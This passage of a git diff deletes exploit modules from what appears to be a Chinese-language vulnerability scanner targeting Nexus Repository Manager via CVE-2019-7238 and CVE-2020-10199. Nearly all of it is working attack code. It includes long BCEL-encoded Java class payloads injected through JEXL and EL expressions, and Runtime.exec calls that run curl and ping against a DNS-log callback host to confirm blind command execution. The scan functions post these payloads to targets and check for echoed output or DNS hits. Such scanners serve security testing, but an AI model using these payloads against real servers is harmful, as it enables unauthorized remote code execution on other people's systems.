$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
-        'headers': {'404': RCEcommand}
-    },
-    # * 无回显POC
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('curl DNSDOMAIN')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('ping -c 4 DNSDOMAIN')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('ping DNSDOMAIN')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
-        'headers': {}
-    },
-]
-
-def cve_2019_7238_scan(self, clients):
-    ''' 3.14.0及之前版本中, 存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能, 
-            这处功能存在未授权访问，可以导致任意命令执行
-    '''
-    client = clients.get('reqClient')
-    sessid = '2649e3a08398e1940ab6b95a7f9a20a5'
-
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-7238',
-    }
-
-    base_headers = {
-        'Content-Type': 'application/json',
-        'X-Requested-With': 'XMLHttpRequest'
-    }
-
-    for payload in cve_2019_7238_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-        headers = payload['headers']
-        
-        merge_headers = head.merge(base_headers, headers)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=merge_headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if ((check.check_res(res.text, random_str))     # * 可以运行命令, 有回显
-            or (dns.result(md, sessid))                 # * 可以运行命令, 无回显
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Nexus/cve_2020_10199.py b/payloads/Nexus/cve_2020_10199.py
deleted file mode 100644
index 390e373..0000000
--- a/payloads/Nexus/cve_2020_10199.py
+++ /dev/null
@@ -1,99 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5, random_int_1
-from lib.tool import head
-from lib.tool import check
-from time import sleep
-
-random_str = random_md5(6)
-RCEcommand = 'echo ' + random_str
-
-random_num = random_int_1()
-random_num_sum = str(random_num * random_num)
-
-cve_2020_10199_payloads = [
-    {
-        'path': 'service/rest/beta/repositories/go/group',
-        'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["${' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"]}}''',
-        'headers': {'404': RCEcommand}
-    },
-    {
-        'path': 'service/rest/beta/repositories/go/group',
-        'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"]}}''',
-        'headers': {'404': RCEcommand}
-    },
-    {
-        'path': 'service/rest/beta/repositories/go/group',
-        'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('curl DNSDOMAIN')}"]}}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/rest/beta/repositories/go/group',
-        'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping -c 4 DNSDOMAIN')}"]}}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/rest/beta/repositories/go/group',
-        'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping DNSDOMAIN')}"]}}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/rest/beta/repositories/go/group',
-        'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{NUM*NUM}"]}}'''.replace('NUM', str(random_num)),
-        'headers': {}
-    }
-]
-
-def cve_2020_10199_scan(self, clients):
-    ''' 3.21.1及之前版本中, 存在一处任意EL表达式注入漏洞 '''
-    client = clients.get('reqClient')
-    sessid = '429d9e16ee5d3c8fd4575342bf02b72e'
-
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2020-10199',
-    }
-
-    base_headers = {
-        'Content-Type': 'application/json',
-        'X-Requested-With': 'XMLHttpRequest',
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-    }
-
-    for payload in cve_2020_10199_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-        headers = payload['headers']
-
-        merge_headers = head.merge(base_headers, headers)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=merge_headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if ((check.check_res(res.text, random_str))  # * 可以运行命令, 有回显
